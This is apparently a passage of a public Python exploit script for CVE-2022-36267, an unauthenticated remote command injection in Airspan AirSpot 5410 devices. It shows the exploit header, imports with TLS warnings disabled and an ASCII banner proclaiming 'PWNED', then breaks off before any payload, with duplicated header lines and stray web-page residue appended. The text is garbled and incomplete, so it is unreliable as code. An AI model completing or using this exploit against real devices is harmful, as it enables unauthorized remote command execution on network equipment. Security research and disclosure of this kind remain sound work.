# -*- coding: utf-8 -*-
# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Exploit Title: AirSpot unauthenticated remote command injection
# Date: 7/26/2022
# Exploit Author: Samy Younsi (NSLABS) (https://samy.link)
# Vendor Homepage: https://www.airspan.com/
# Software Link: https://wdi.rfwel.com/cdn/techdocs/AirSpot5410.pdf
# Version: 0.3.4.1-4 and under.
# Tested on: Airspan AirSpot 5410 version 0.3.4.1-4 (Ubuntu)
# CVE : CVE-2022-36267
from __future__ import print_function, unicode_literals
import argparse
import requests
import urllib3
urllib3.disable_warnings()
def banner():
airspanLogo = """
,-.
/ `. __..-,O
: --''_..-'.'
| . .-' `. '.
: . .`.'
`. / ..
`. ' .
`, `.
,|,`. `-.
'.|| ``-...__..-`
| | Airspan
|__| AirSpot 5410
/|| PWNED x_x
//||\
// || \
__//__||__\__
'--------------'Necrum Security Labs
AirSpot 5410 0.3.4.1-4 Remote Command Injection
- Details
- Written by: khalil
- Category: Vulnerabilities
- Hits: 517